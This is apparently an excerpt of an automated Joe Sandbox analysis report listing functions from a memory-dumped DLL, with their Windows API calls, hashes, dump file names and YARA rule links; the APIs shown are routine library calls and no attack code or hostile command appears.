Opcode Fuzzy Hash: 5b24761d64c154df00430e5c135009ce7fe624fc417e984a547854349497f88e
Instruction Fuzzy Hash: 26F0C272E481459BCB106BA8C888BDD7378EB03359F4402B6D615D7F80FF354A2A8761

Function 6CB1F1EE Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000000,?,?,6CB19F33,?,00000000,6CC83C34,00000000), ref: 6CB1F1F4
SetErrorMode.KERNEL32(00000000,?,?,6CB19F33,?,00000000,6CC83C34,00000000), ref: 6CB1F200

Part of subcall function 6CB1F24C: GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,?), ref: 6CB1F287
Part of subcall function 6CB1F24C: PathFindExtensionW.SHLWAPI(?), ref: 6CB1F2A1

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ErrorMode$ExtensionFileFindModuleNamePath
String ID:
API String ID: 1764437154-0
Opcode ID: 3713f030a5c501f2f4ed5a75a6e777ffae9210a19ba6ff966ff7e4bff805f649
Instruction ID: a8252fb7a1869f8751033990df264e66a211fbbfd74b17b4734ce80b98085e9a
Opcode Fuzzy Hash: 3713f030a5c501f2f4ed5a75a6e777ffae9210a19ba6ff966ff7e4bff805f649
Instruction Fuzzy Hash: 07F090759192848FDB00EF65D008A4E7FE9EF05259F048059F908CBF01CB71C443CB92

Function 6CB4ED6E Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB4ED75

Part of subcall function 6CB4FA50: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003), ref: 6CB4FAAD
Part of subcall function 6CB4FA50: VerSetConditionMask.KERNEL32(00000000), ref: 6CB4FAB5
Part of subcall function 6CB4FA50: VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 6CB4FAC6
Part of subcall function 6CB4FA50: GetSystemMetrics.USER32(00001000), ref: 6CB4FAD7

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ConditionMask$H_prolog3InfoMetricsSystemVerifyVersion
String ID:
API String ID: 2710481357-0
Opcode ID: 3ff046ac0b3b7cd3c38758eb58ab15edf3dc213a5a7892024ab3e821b04a40af
Instruction ID: fe04fe3a1875f84787a62dab64a5968f208eed775880ad0fc314b02c01af602a
Opcode Fuzzy Hash: 3ff046ac0b3b7cd3c38758eb58ab15edf3dc213a5a7892024ab3e821b04a40af
Instruction Fuzzy Hash: 4151DEB0906F418FD3A9CF3A85417C6FAE0BF89300F108A2E91AED6661EB7061849F55

Function 6CB1AF82 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB1AF89

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: ce223853bf6692fb70fae567b59b2c69079492fa1b9d62d534653775ca94b764
Instruction ID: 7d9c834a6f8638bdd229ac15b494a7973bbc4926b2aaab53fa21b383b79fc46c
Opcode Fuzzy Hash: ce223853bf6692fb70fae567b59b2c69079492fa1b9d62d534653775ca94b764
Instruction Fuzzy Hash: DD119370B005618FCF04EF2888947AC73A6BF44658F4404B9C815EF760EF34ED198B99

Function 6CC63529 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CC639D9,00000001,00000364,?,6CC56FFF,6CC634C4,?,?,6CB1A014,?,00000001,?), ref: 6CC6356A

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e69214e403d5261ed9fd57fd4d17a72606e963eb0466fb5cf59f66faaf360a25
Instruction ID: 2338281e4e14069631564762ee18525671d481a1f8aff636ddaa86aa63804b21
Opcode Fuzzy Hash: e69214e403d5261ed9fd57fd4d17a72606e963eb0466fb5cf59f66faaf360a25
Instruction Fuzzy Hash: 25F0BB31B0562556EB115A2B8A84B773B68AF42764B188111EC14D7E90FB30D90586A0

Function 6CB1B968 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 6CB1B988

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 39fb0906e3a5f1d6309373be30d47d5a8f82d7f50d3dc4b9821f63c0dd148f3b
Instruction ID: cce94ad931ed575055715248fad03553a55bfb7b26293bc6bb27195f573f7fe5
Opcode Fuzzy Hash: 39fb0906e3a5f1d6309373be30d47d5a8f82d7f50d3dc4b9821f63c0dd148f3b
Instruction Fuzzy Hash: D1E02633408224A78B224F569C008CB77ACEF813E47444036FD18A3F14E631956683E1

Function 6CB1A91A Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(8007000E,?,00000006,?,6CB1B0E8,8007000E,?,00000000,00000000,?,6CB1B0D1,00000000,8007000E,8007000E,?), ref: 6CB1A92D

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: FindResource
String ID:
API String ID: 1635176832-0
Opcode ID: f25d8b6ceaae218c1da11f811ddc83305ca15cc85c0d6f40f131779b2dc44988
Instruction ID: 784793c51b3e9dc935c6dcba5797f6ea1228ca987c24996934d441fecd76944b
Opcode Fuzzy Hash: f25d8b6ceaae218c1da11f811ddc83305ca15cc85c0d6f40f131779b2dc44988
Instruction Fuzzy Hash: 8BD05E7125414C7FEF011E55EC00EBA3BBDEB80658F009061FD0DC9A60E732EA62AA50

Function 6CB25CD2 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 6CB25CE1

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: DeleteObject
String ID:
API String ID: 1531683806-0
Opcode ID: 1c73b86fbc8888c70cda88f8fbd9e47557f166686ffd0bd912a3748bb2e70e96
Instruction ID: f8fee904e984bf058b7ab7e430030f1db5d1dfcfaae2c81969f4690553eae418
Opcode Fuzzy Hash: 1c73b86fbc8888c70cda88f8fbd9e47557f166686ffd0bd912a3748bb2e70e96
Instruction Fuzzy Hash: A8B092B0902188BACF005630C50CB2A3AB49B4230FF189994A408C6409EB3D908A8A08

Function 6CB019A0 Relevance: 1.5, APIs: 1, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: File$CreateModuleNamePathReadRemoveSizeSpec
String ID:
API String ID: 2445516684-0
Opcode ID: 909ce139019bdab03df654bb21cfa8a6483a01a353cf7b5a67b0f8373dfaf3e8
Instruction ID: 37c5e78e13fb1d1b362e0da5b7e67fe4c7a2713e97053ee244ee3da36e6b2cd4
Opcode Fuzzy Hash: 909ce139019bdab03df654bb21cfa8a6483a01a353cf7b5a67b0f8373dfaf3e8
Instruction Fuzzy Hash:

Non-executed Functions

Function 6CB42C80 Relevance: 27.4, APIs: 18, Instructions: 379windowCOMMON

Download Yara Rule

APIs

MessageBeep.USER32 ref: 6CB42CA6
SendMessageW.USER32(?,000000B0,?,?), ref: 6CB42CED

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Message$BeepSend
String ID:
API String ID: 1008054038-0
Opcode ID: e05063b5b350e18e6177ebdc8bfad01dff3af483a07728bf3211f869743885ef
Instruction ID: 904d40398962b03b78522f3adbf2d1f77abe89155737a57eef39ebae26c92039
Opcode Fuzzy Hash: e05063b5b350e18e6177ebdc8bfad01dff3af483a07728bf3211f869743885ef
Instruction Fuzzy Hash: 8DD16975A08548FFCF11CBA4C888EDFBBBDFB05315F148656E511E3684D730AA44AB62

Function 6CB82D52 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 388windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB82D59
BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 6CB82F8E
DeleteObject.GDI32(?), ref: 6CB82FA5
MulDiv.KERNEL32(?,00000000,00000064), ref: 6CB83141
MulDiv.KERNEL32(?,00000000,00000064), ref: 6CB8315E
MulDiv.KERNEL32(?,00000000,00000064), ref: 6CB8317D
MulDiv.KERNEL32(6CB3CE03,00000000,00000064), ref: 6CB8319A
MulDiv.KERNEL32(?,00000000,00000064), ref: 6CB831B6
MulDiv.KERNEL32(?,00000000,00000064), ref: 6CB831D3

Strings

d, xrefs: 6CB82DAE

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: DeleteH_prolog3Object
String ID: d
API String ID: 2942389277-2564639436
Opcode ID: 3d72174cf22cc62a76e4287bdcbc95304c603dbcbf52904614fcf58cc97aee82
Instruction ID: 7eed49baaa57b17c68dd37facf901afd377c3453691abcd86cc0ebc6db935083
Opcode Fuzzy Hash: 3d72174cf22cc62a76e4287bdcbc95304c603dbcbf52904614fcf58cc97aee82
Instruction Fuzzy Hash: BCE1BB70A012AA9FDF04CFA9CD48AAEBFB0EF49305F144169F805EB691DB34D915CB61

Function 6CB36945 Relevance: 13.6, APIs: 9, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetPropW.USER32(?), ref: 6CB3696B
GlobalLock.KERNEL32(00000000), ref: 6CB36974
SendMessageW.USER32(?,00000476,00000000,00000000), ref: 6CB3698F
GlobalUnlock.KERNEL32(00000000), ref: 6CB3699A
RemovePropW.USER32(?), ref: 6CB369A9
GlobalFree.KERNEL32(00000000), ref: 6CB369B4

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Global$Prop$FreeLockMessageRemoveSendUnlock
String ID:
API String ID: 2391254433-0
Opcode ID: 2287fbf32b6c9603e85b6d652e1b479ce2a92c133aa5cb9c06e2a4e3ebbafef4
Instruction ID: 03af91c01645db98f7704e2cac498d276c0c6cbd8189317c673668be5839f41a
Opcode Fuzzy Hash: 2287fbf32b6c9603e85b6d652e1b479ce2a92c133aa5cb9c06e2a4e3ebbafef4
Instruction Fuzzy Hash: 5821FF31341261ABEB105F31CC08B2B3E7DFB0B749F04A128E64AE2A91EB71D411CA61

Function 6CB2E966 Relevance: 12.1, APIs: 8, Instructions: 131fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB2E970
GetFullPathNameW.KERNEL32(?,00000104,00000000,?,00000268,6CB2E236,?,?,00000000,?,6CB319C3,00000024,?,?,?), ref: 6CB2E9A0

Part of subcall function 6CB1FBA5: __CxxThrowException@8.LIBVCRUNTIME ref: 6CB1FBB9

PathIsUNCW.SHLWAPI(?,?,?,00000000,?,6CB319C3,00000024,?,?,?), ref: 6CB2EA18
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,6CB319C3,00000024,?,?,?), ref: 6CB2EA3C
CharUpperW.USER32(?,?,6CB319C3,00000024,?,?,?), ref: 6CB2EA6A
FindFirstFileW.KERNEL32(?,?,?,6CB319C3,00000024,?,?,?), ref: 6CB2EA82
FindClose.KERNEL32(00000000,?,6CB319C3,00000024,?,?,?), ref: 6CB2EA8E
_wcslen.LIBCMT ref: 6CB2EAAD

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3_InformationNameThrowUpperVolume_wcslen
String ID:
API String ID: 3015096244-0
Opcode ID: 3713fa8e41791f3de25697abd1e3b6919900a73b882c608cc81d04d6863983e4
Instruction ID: 15a7db44ec4fc9a68b11376210403b0fdc6059fe79665c2d85e070da44ca7452
Opcode Fuzzy Hash: 3713fa8e41791f3de25697abd1e3b6919900a73b882c608cc81d04d6863983e4
Instruction Fuzzy Hash: 3041B5B1905595AFDB20EB75CC88FFF777CFF02309F040695E41992A40EB399E498AA1

Function 6CB36E75 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 194comCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB36E7F
GetVersionExW.KERNEL32(00000114), ref: 6CB36F07
_wcschr.LIBVCRUNTIME ref: 6CB37067
CoInitializeEx.OLE32(00000000,00000002), ref: 6CB37091
CoCreateInstance.OLE32(6CCAFE2C,00000000,00000001,6CC881E4,?), ref: 6CB370D8

Strings

@, xrefs: 6CB36FEA

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CreateH_prolog3_InitializeInstanceVersion_wcschr
String ID: @
API String ID: 2940554968-2766056989
Opcode ID: a51e3a9f18cbb3ab71193263a82e9dd079d67f6c849394248b741521ccd729d2
Instruction ID: b929fb4ec24c2c07d5f36201e69ff535471d97dac3ccbcedc38f1aee6d35ca38
Opcode Fuzzy Hash: a51e3a9f18cbb3ab71193263a82e9dd079d67f6c849394248b741521ccd729d2
Instruction Fuzzy Hash: FE8157B1A01652EFDB54CF28C944BDABBB4BF09314F004259E85CE7740EB74A968CF95

Function 6CB299B8 Relevance: 6.0, APIs: 4, Instructions: 38keyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB2D632: GetWindowLongW.USER32(?,000000F0), ref: 6CB2D63F

GetKeyState.USER32(00000010), ref: 6CB299D5
GetKeyState.USER32(00000011), ref: 6CB299E2
GetKeyState.USER32(00000012), ref: 6CB299EF
SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 6CB29A09

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: 98e187ba9005a5bb688a348f42e2151a6f11d0b75f723689ef9fbf6bd7f9e1d7
Instruction ID: 79715272e0cf72c4107107f6489a23650fe4c544767050f212d12f77a0f1bb6b
Opcode Fuzzy Hash: 98e187ba9005a5bb688a348f42e2151a6f11d0b75f723689ef9fbf6bd7f9e1d7
